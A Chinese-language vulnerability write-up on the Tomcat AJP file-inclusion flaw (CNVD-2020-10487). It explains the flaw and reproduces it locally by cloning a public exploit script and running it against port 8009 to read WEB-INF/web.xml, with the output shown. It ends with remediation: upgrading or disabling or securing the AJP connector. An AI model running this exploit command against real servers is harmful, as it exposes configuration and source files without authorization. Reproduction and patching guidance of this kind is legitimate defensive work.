一、漏洞说明
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等。
二、复现
-
本地使用问题版本
tomcat
启动服务,本文使用apache-tomcat-8.5.16
版本 -
下载复现用的
python
脚本,要求python
版本 2.7git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi.git
-
使用
conda
创建运行脚本所需的环境,省略conda
安装过程,本文安装的是miniConda
# 创建名为 CNVD-2020-10487-Tomcat-Ajp-lfi 的虚拟空间,并指定 python 版本为2.7 conda create -n CNVD-2020-10487-Tomcat-Ajp-lfi python=2.7 # 激活 CNVD-2020-10487-Tomcat-Ajp-lfi 虚拟空间 conda activate CNVD-2020-10487-Tomcat-Ajp-lfi
-
使用脚本利用漏洞读取文件
python ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 127.0.0.1 -p 8009 -f WEB-INF/web.xml
-
控制台输出对应文件内容
Getting resource at ajp13://127.0.0.1:8009/asdf ---------------------------- <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" version="3.1" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to Tomcat </description> </web-app>
三、修复
-
首先建议升级
tomcat
版本,升级到 9.0.31、8.5.51 或 7.0.100 以上版本。 -
无法更新版本,可以考虑临时禁用 AJP 协议8009端口,在
tomcat
根目录下找到conf/server.xml
配置文件中注释掉<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
-
如需要用到 ajp 协议(未经本人验证,只是提供参考,还请自行验证可行性)
-
修改默认端口
-
为 AJP Connector 配置 secret
<Connector port="18009" protocol="AJP/1.3" redirectPort="8443" address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>
-